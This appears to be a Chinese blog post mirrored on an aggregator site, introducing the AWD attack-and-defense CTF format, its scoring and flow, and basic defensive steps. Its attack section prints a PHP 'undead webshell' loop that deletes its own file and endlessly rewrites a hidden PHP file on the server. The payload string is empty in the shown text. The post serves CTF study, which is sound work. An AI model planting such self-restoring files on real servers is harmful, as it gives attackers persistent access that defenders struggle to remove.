码农知识堂 - 1000bd
  •   Python
  •   PHP
  •   JS/TS
  •   JAVA
  •   C/C++
  •   C#
  •   GO
  •   Kotlin
  •   Swift
  • 关于awd赛制的学习路程·awd的理论内容


    什么是awd

    AWD(Attack With Defense,攻防兼备)模式是一个非常有意思的模式,你需要在一场比赛里要扮演攻击方和防守方,攻者得分,失守者会被扣分。也就是说,攻击别人的靶机可以获取 Flag 分数时,别人会被扣分,同时你也要保护自己的主机不被别人得分,以防扣分。

    在攻防模式中,参赛队伍分别防守同样配置的虚拟靶机,并在有限的博弈时间内,找到其他战队的薄弱环节进行攻击,同时要对自己的靶机环境进行加固防守。比赛采用零和积分方式,即每个战队都拥有相同的起始分数,挖掘网络服务漏洞并攻击对手服务取得flag获得积分,被攻击方扣减相应分数;修补自身服务漏洞进行防御来避免丢分,最终以得分高低直接分出胜负。

    adw比赛的流程

    1. 出题方会给每一支队伍部署同样环境的主机,主机有一台或者多台。
    2. 拿到机器后每个队伍会有一定的加固时间或没有加固时间,这个视规则而定。
    3. 每个服务、数据库、主机上都会可能存在 flag 字段,并且会定时刷新。通过攻击拿到 flag 后需要提交到裁判机进行得分,一般会提供指定的提交接口。下一轮刷新后,如果还存在该漏洞,可以继续利用漏洞获取 flag 进行得分。

    防守

    waf部署

    一些waf软件部署,不过要看清要求,可能比赛并不允许一些waf

    文件备份

    备份网站文件,方便之后的恢复

    后门扫描

    扫扫看,看看有没有后门

    文件监控

    监控网站文件,防止被篡改和添加

    攻击

    不死马

    1. ignore_user_abort(true);
    2. set_time_limit(0);
    3. @unlink(__FILE__);
    4. $file = '.ZYGS.php';
    5. $code = '';
    6. while (1){
    7. file_put_contents($file,$code);
    8. usleep(5000);
    9. }
    10. ?>

    其他好用的工具

    这个就靠平时的积累了

  • 相关阅读:
    什么是capturing lambda
    解决caffe中的python环境安装的问题
    糟了,生产环境数据竟然不一致,人麻了!
    【安卓逆向】去除云注入(使用MT论坛dl的方法总结拓展)
    认识NIO
    九科-模块化-创建目录_如果不存在
    Vue工程化中创建全局组件、extend创建组件、extends配置组件、异步组件
    JavaScript 72 JavaScript vs jQuery 72.4 JavaScript jQuery HTML DOM
    Nomad 系列-快速上手
    信息化疫情防控很有必要,老厂商出手了
  • 原文地址:https://blog.csdn.net/m0_61361405/article/details/132629829
  • 最新文章
  • 攻防演习之三天拿下官网站群
    数据安全治理学习——前期安全规划和安全管理体系建设
    企业安全 | 企业内一次钓鱼演练准备过程
    内网渗透测试 | Kerberos协议及其部分攻击手法
    0day的产生 | 不懂代码的"代码审计"
    安装scrcpy-client模块av模块异常,环境问题解决方案
    leetcode hot100【LeetCode 279. 完全平方数】java实现
    OpenWrt下安装Mosquitto
    AnatoMask论文汇总
    【AI日记】24.11.01 LangChain、openai api和github copilot
  • 热门文章
  • 十款代码表白小特效 一个比一个浪漫 赶紧收藏起来吧!!!
    奉劝各位学弟学妹们,该打造你的技术影响力了!
    五年了,我在 CSDN 的两个一百万。
    Java俄罗斯方块,老程序员花了一个周末,连接中学年代!
    面试官都震惊,你这网络基础可以啊!
    你真的会用百度吗?我不信 — 那些不为人知的搜索引擎语法
    心情不好的时候,用 Python 画棵樱花树送给自己吧
    通宵一晚做出来的一款类似CS的第一人称射击游戏Demo!原来做游戏也不是很难,连憨憨学妹都学会了!
    13 万字 C 语言从入门到精通保姆级教程2021 年版
    10行代码集2000张美女图,Python爬虫120例,再上征途
Copyright © 2022 侵权请联系2656653265@qq.com    京ICP备2022015340号-1
正则表达式工具 cron表达式工具 密码生成工具

京公网安备 11010502049817号